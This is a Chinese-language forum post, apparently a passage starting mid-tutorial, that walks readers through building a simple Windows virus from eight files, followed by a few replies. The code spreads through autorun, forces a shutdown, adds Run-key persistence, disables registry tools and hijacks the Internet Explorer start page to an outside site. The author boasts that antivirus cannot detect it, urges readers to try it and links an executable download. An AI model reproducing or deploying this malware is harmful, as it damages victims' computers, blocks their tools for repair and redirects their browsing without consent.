Shellexecute=123.bat
然后保存,在把这个新建文本文档.txt改名字,改为“AutoRun.inf”(不要复制双引号),OK,第一个文件建立完毕,继续------
在新建一个文本文档,把下列代码复制进去:
copy C:\WINDOWS\2.exe d:\
copy C:\WINDOWS\123.bat d:\
copy C:\WINDOWS\AutoRun.inf d:\
copy C:\WINDOWS\1.reg d:\
copy C:\WINDOWS\2.reg d:\
copy C:\WINDOWS\3.reg d:\
copy C:\WINDOWS\4.reg d:\
copy C:\WINDOWS\11.bat d:\
regedit.exe /s 1.reg
regedit.exe /s 2.reg
regedit.exe /s 3.reg
regedit.exe /s 4.reg
123.bat
cls
1.exe
然后保存,改名字,改为“1234.bat”(不要复制双引号),OK,第二个文件建立完毕,继续------
在新建一个文本文档,把下列代码复制进去:
shutdown -s -t 3
regedit.exe /s 1.reg
regedit.exe /s 2.reg
regedit.exe /s 3.reg
regedit.exe /s 4.reg
cls
2.exe
然后保存,改名字,改为“123.bat”(不要复制双引号),OK,第三个文件建立完毕,继续------
在新建一个文本文档,把下列代码复制进去:
regedit.exe /s 1.reg
regedit.exe /s 2.reg
regedit.exe /s 3.reg
regedit.exe /s 4.reg
然后保存,改名字,改为“11.bat”(不要复制双引号),OK,第四个文件建立完毕,继续------
在新建一个文本文档,把下列代码复制进去:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"11"="D:\\11.bat"
"22"="D:\\winlogon.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL]
"Installed"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI]
"NoChange"="1"
"Installed"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS]
"Installed"="1"
然后保存,改名字,改为“4.reg”(不要复制双引号),OK,第五个文件建立完毕,继续------
在新建一个文本文档,把下列代码复制进去:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
然后保存,改名字,改为“3.reg”(不要复制双引号),OK,第六个文件建立完毕,继续------
在新建一个文本文档,把下列代码复制进去:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"NoUpdateCheck"=dword:00000001
"NoJITSetup"=dword:00000001
"Disable Script Debugger"="yes"
"Show_ChannelBand"="No"
"Anchor Underline"="yes"
"Cache_Update_Frequency"="Once_Per_Session"
"Display Inline Images"="yes"
"Do404Search"=hex:01,00,00,00
"Local Page"="C:\\WINDOWS\\system32\\blank.htm"
"Save_Session_History_On_Exit"="no"
"Show_FullURL"="no"
"Show_StatusBar"="yes"
"Show_ToolBar"="yes"
"Show_URLinStatusBar"="yes"
"Show_URLToolBar"="yes"
"Start Page"="http://z82325777.myrice.com/xiaochuan.htm"
"Use_DlgBox_Colors"="yes"
"Search Page"="http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch"
"FullScreen"="no"
"Use FormSuggest"="yes"
"FormSuggest Passwords"="yes"
"FormSuggest PW Ask"="yes"
"AutoSearch"=dword:00000005
"Print_Background"="no"
"Play_Animations"="yes"
"Play_Background_Sounds"="yes"
"Display Inline Videos"="yes"
"Enable_MyPics_Hoverbar"="yes"
"Enable AutoImageResize"="yes"
"Show image placeholders"=dword:00000000
"Expand Alt Text"="no"
"Move System Caret"="no"
"UseThemes"=dword:00000001
"NscSingleExpand"=dword:00000001
"DisableScriptDebuggerIE"="yes"
"Enable Browser Extensions"="yes"
"FavIntelliMenus"="no"
"NoWebJITSetup"=dword:00000000
"Force Offscreen Composition"=dword:00000000
"SmoothScroll"=dword:00000001
"NotifyDownloadComplete"="no"
"Error Dlg Displayed On Every Error"="no"
"Friendly http errors"="yes"
"Page_Transitions"=dword:00000001
"ShowGoButton"="yes"
"AllowWindowReuse"=dword:00000001
"Window_Placement"=hex:2c,00,00,00,00,00,00,00,01,00,00,00,ff,ff,ff,ff,ff,ff,\
ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00,20,03,00,00,58,02,00,\
00
"StatusBarOther"=dword:00000001
"AddToFavoritesExpanded"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl]
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN]
"iexplore.exe"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings]
"LOCALMACHINE_CD_UNLOCK"=dword:00000000
其中"Start Page"="XXXX" 中间的XXX改为你想要的网站地址,也就是说,当别人一打开IE的时候,就会自动进入这个网站
然后保存,改名字,改为“2.reg”(不要复制双引号),OK,第七个文件建立完毕,继续------
在新建一个文本文档,把下列代码复制进去:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"HOMEPAGE"=dword:00000001
然后保存,改名字,改为“1.reg”(不要复制双引号),OK,第八个文件建立完毕!
OK了,到了这里,我想大家一定已经建立好了8个文件了吧?
分别是1234.bat , 123.bat , 11.bat , 1.reg , 2.reg , 3.reg , 4.reg
看下是不是没错`如果没错~那么就OK了
到此就一段落了~~~这时候,只要你一运行1234.bat,那么,病毒就开始运行了~~~至于有什么后果~大家自己试试就知道啦~哈哈~~~
顺便发个下载地址http://z82325777.myrice.com/z.exe(加了VB的大家要乱试!)
我想懂一点的人,看一下就应该明白了~的确很简单,重要的是一条思路而已~~呵呵~而且~可以世界上没任何杀毒软件能查杀~怎么样?很棒吧?
不过这个没保护进程~所以很容易被清除,而且破坏力不是很强大~
卡巴果然没查出来。。。
病毒我就不试了
貌似是篡改主页的吧Start Page"="http://z82325777.myrice.com/xiaochuan.htm
额...强人~~~
欢迎光临 一朵物语 (http://bbs.yiduo.org/) | Powered by Discuz! X3.2 |